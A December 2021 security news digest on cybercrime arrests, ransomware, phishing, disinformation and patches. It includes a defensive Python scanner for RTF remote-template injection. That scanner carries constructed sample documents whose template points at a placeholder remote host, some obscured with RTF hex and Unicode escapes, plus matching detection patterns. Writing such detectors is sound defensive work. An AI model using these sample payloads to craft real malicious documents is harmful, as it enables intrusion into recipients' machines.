FFT news digest Dec 3 2021

Crime and a little punishment

This year has seen a marked improvement in international efforts to combat cyber crime. This week, Interpol said a coordinated investigation led to the arrests of 1,003 people linked to a range of crimes including romance scams, investment frauds, illegal gambling and money laundering. It also resulted in the interception of nearly £27 million and the suspension of 2,350 bank accounts. And Europol announced the arrests of 1,803 'money mules' who help to launder the proceeds of online crime.

On a less positive note, a Russian court imposed a one-year suspended sentence on a member of the notorious FIN7 hacking group. The Record identified the man as Maxim Zhukov Sergeevich who had worked for a company described by the US Department of Justice as a front for FIN7. Zhukov is the first member of a major cybercrime group to be detained and tried in Russia since 2016. His sentence is hardly likely to discourage others.

Although the tools used for cybercrime may be sophisticated, the people who use them don't need to be. That's because it's relatively easy for anyone to set themselves up as a cyber criminal by renting the necessary kit. These tool sets include email templates, scripts and a stylish management interface with which to manage attacks. They're designed to steal credentials and financial details, and in some cases they can defeat multi-factor authentication.

And finally, Symantec is warning about a new ransomware variant which it says is gaining traction among criminal organisations.
'Yanluowang' includes several tools designed to steal passwords stored in browsers, and Symantec says it has been used to target a wide range of sectors including IT services, consultancy and finance. Many of the ransomware strains are designed to be used in two-pronged attacks which not only encrypt data but also threaten to publish it online if the victim refuses to pay up.

Threats

COVID-19: Wretched scumbags have begun harnessing the Omicron variant in phishing emails. The messages appear to come from the NHS and purport to offer a free Omicron PCR test. Bleeping Computer

Adobe: Sneaky campaign uses emails with PDF attachments. If opened, a Google Drive page is displayed with a friendly blue button inviting the user to 'Preview PDF'. Clicking it runs a malicious Windows installer that masquerades as an 'Adobe PDF Component'. It all looks horribly credible. Bleeping Computer

SMS: Examples from Finland and Iran of how text messages are used to distribute malicious software. In both cases, they're designed to persuade users to install a malicious app on Android smartphones. Check Point

North Korea: Sophisticated campaign dissected by Kaspersky. Malicious software targets Windows and Android devices, but the process begins with research that includes hijacking a victim's Facebook account and contacting friends to glean details to use in email lures.

IKEA: The Swedish furniture maker cum housing developer is facing a persistent phishing campaign that appears to originate from internal addresses. The emails look unconvincing, but because they originate from inside the company, recipients are more likely to click on the malicious links they contain. Bleeping Computer

Credit cards: It's probably time for a rethink about credit card numbers because hackers have figured out a way to guess them - and there's nothing we can do about it. The problem is that the numbers follow a fixed pattern. The result is that card details can be bought for as little as £0.75. TechRadar

Disinformation

Facebook took down a COVID-19 disinformation campaign that involved Chinese government officials and was amplified by Chinese state media. 'MetaFace's' end of year Adversarial Threat Report says it removed 524 Facebook accounts that originated primarily in China and targeted English-speaking audiences in the US and UK. In one example, a Facebook user claimed to be a Swiss biologist and criticised the US government for allegedly demanding the WHO keep investigating the Chinese origin of COVID-19. Disinformation networks ("Coordinated Inauthentic Behaviour") linked to Palestine, Poland and Belarus were also taken down. Meanwhile, the Facebook Protect security program has been expanded to include activists, journalists, and government officials.

RTF

Hacking groups connected to Russia, China and India are making increasing use of documents in 'Rich Text Format'. The technique was first spotted earlier this year, but Proofpoint says groups have been optimising it since then. The attack exploits a legitimate feature of the RTF format, which governs how a document should be displayed. Normally, this would be achieved by referring to a local file. The exploit subverts this to retrieve a remote, malicious resource. To defend against this threat, it's important that users are aware of the risk of RTF files - which are often regarded as relatively safe. Such attachments should be scanned with antivirus programs and apps should be kept up to date.
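The RTF feature Proofpoint describes is the `\*\template` control word, which tells Word where to load the document's template from; normally that is a local `.dot`/`.dotm` path, and the technique simply replaces it with a URL. A mail-gateway or endpoint check for this is short enough to show in full. The scanner below is an added example written for this digest, not code from Proofpoint or from any vendor: it looks at file content rather than the extension (a renamed RTF still opens in Word), extracts every template destination, undoes the `\'hh` hex and `\uN?` Unicode escapes that have been used to hide the string `http://`, and flags any destination that points at a URL or UNC path. The sample documents and the `.invalid` host are constructed for the example.

```python
import re
from typing import List, Tuple

# Constructed sample files (not real malware). The benign one uses a local
# template path; the others point the template at a remote host, two of
# them with the URL hidden behind RTF escape sequences.
SAMPLES = {
    "benign.rtf":   rb"{\rtf1\ansi{\*\template C:\\Users\\me\\Templates\\Normal.dotm}Hello}",
    "remote.rtf":   rb"{\rtf1\ansi{\*\template http://template-host.invalid/t.dotm}Hello}",
    "hexed.rtf":    rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://template-host.invalid/t.dotm}Hello}",
    "unicoded.rtf": rb"{\rtf1\ansi{\*\template \u104?\u116?\u116?\u112?://template-host.invalid/t.dotm}Hello}",
    "notrtf.doc":   b"\xd0\xcf\x11\xe0 not an rtf file",
}

# {\*\template <destination>} : the destination group ends at the closing brace.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^{}]*)\}", re.IGNORECASE)
# Anything that would make Word fetch the template over the network.
REMOTE_RE = re.compile(rb"^(?:https?|ftp|file)://|^\\\\", re.IGNORECASE)

HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")       # \'hh  -> one byte
UNICODE_ESCAPE = re.compile(rb"\\u(-?\d+)\??")          # \uN?  -> code point N


def unescape_rtf(raw: bytes) -> bytes:
    """Resolve the RTF escapes an attacker can use to obscure a URL."""
    out = HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    out = UNICODE_ESCAPE.sub(
        lambda m: chr(int(m.group(1)) & 0xFFFF).encode("utf-8", "replace"), out)
    return out.replace(b"\\\\", b"\\")  # \\ is an escaped backslash in RTF


def scan_rtf(data: bytes) -> Tuple[str, List[str]]:
    """Classify one file by content.

    Returns (verdict, template_targets) where verdict is one of
    'not-rtf', 'clean', 'local-template' or 'remote-template'.
    """
    if not data.lstrip().startswith(b"{\\rtf"):
        return "not-rtf", []
    remote, local = [], []
    for match in TEMPLATE_RE.finditer(data):
        target = unescape_rtf(match.group(1)).strip()
        bucket = remote if REMOTE_RE.match(target) else local
        bucket.append(target.decode("latin-1"))
    if remote:
        return "remote-template", remote
    if local:
        return "local-template", local
    return "clean", []


if __name__ == "__main__":
    for name, content in SAMPLES.items():
        verdict, targets = scan_rtf(content)
        print(f"{name:14} {verdict:16} {targets}")
```

Treat `remote-template` as a block-and-alert condition: a document whose template lives on the internet has no place in ordinary email traffic. The check is deliberately narrow (one control word) so that it stays cheap to run on every attachment; it complements, rather than replaces, the antivirus scanning the paragraph recommends.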

Cloud (in)security

Cloud services offer enormous advantages to organisations, but they're also catnip for attackers. Palo Alto Networks set up deliberately misconfigured servers and found that it took only minutes for attackers to compromise them. Its 'honeypot' network included misconfigured instances of common cloud services including remote desktop protocol (RDP), secure shell protocol (SSH), server message block (SMB), and accounts with default or weak passwords. "When a misconfigured or vulnerable service is exposed to the internet, it takes attackers just a few minutes to discover and compromise the service. There is no margin of error when it comes to the timing of security fixes," Palo Alto said.

Encrypted messaging

An FBI training document underlines the extent to which US law enforcement agencies can access the content of encrypted messaging services such as WhatsApp and iMessage. The infographic, obtained by Rolling Stone, doesn't include new information, but it does show the various legal mechanisms that can be used to extract sensitive data from services that are supposed to be focussed on user privacy. WhatsApp is a particularly rich resource for law enforcement. If presented with a search warrant, it will provide more information - much of it in real time - than other comparable services. That includes not just the contacts of a targeted user, but also other users who have the targeted individual in their contacts.

In brief

China: Security officials in Henan province (one of China's largest) have commissioned a surveillance system designed to track journalists and international students among other "suspicious people", according to documents reviewed by Reuters.

Netflix: Despite longstanding calls to implement two-factor authentication, Netflix still hasn't done so. That puts users at significant risk because all someone needs to take over an account is a name, email address and credit card number. The Next Web recommends adding your phone number in Settings - though that may not help if an attacker knows that as well.

Clearview: The UK Information Commissioner's Office has announced its intention to impose a £17 million fine on the photo harvesting service. It said Clearview lacked a “lawful reason” for collecting people’s personal photos and information.

Slow: The move to remote working caused by the COVID-19 pandemic was bedevilled by sluggish laptops and often unresponsive IT departments, according to research by Apogee (which provides managed technology services). 35% of workers surveyed said they had faced obstacles in working remotely.

Titles: The 'Principality of Sealand' occupies a decommissioned military fort in the North Sea. Among its money making schemes is the sale of titles such as duke and baron. Unfortunately, its website has been hacked, and all transactions since October 12 have been intercepted. The Record

Don't be evil: Three former employees who were fired by Google in 2019 have sued the company, claiming it violated the part of its code of conduct that says “Don’t Be Evil.” The three say they were sacked for protesting against Google's sale of solutions to US Customs and Border Protection. Motherboard

Updates

The US government’s cybersecurity agency has updated its list of “known exploited vulnerabilities” in commonly used products from Qualcomm, Mikrotik, Zoho and the Apache Software Foundation. CISA has set deadlines for federal agencies to apply fixes for the vulnerabilities - and its catalogue provides a handy checklist for the rest of us.

Zoom: New feature enables desktop clients on Windows and macOS to be updated automatically. We recommend activating it because of the number of security updates released by Zoom. Just this week, two issues were addressed, one of them rated "high-severity". Those are among 18 updates in the past two months.

HP: Updates to address a vulnerability affecting more than 150 multi-function printers. The issue can be exploited by tricking targets into visiting a webpage containing a maliciously crafted font. It's the process of printing a document containing the font that allows an attacker to execute code remotely.

Exchange: A ransomware gang is accessing corporate networks by exploiting Microsoft Exchange servers that haven't been updated to address 'ProxyShell' vulnerabilities. Red Canary

iOS 15: More problems with the latest iOS version. Numerous users are reporting problems with Bluetooth connectivity in cars. iPhone 12 and iPhone 13 models appear to be most affected. 9to5Mac

MacBook: There appears to be a charging issue affecting some 16-inch MacBook Pro machines. Users have been complaining that the MagSafe 3 connector sometimes fails to deliver the required charge when the device is turned off and the lid is closed. The issue appears to be intermittent and doesn't affect all users.
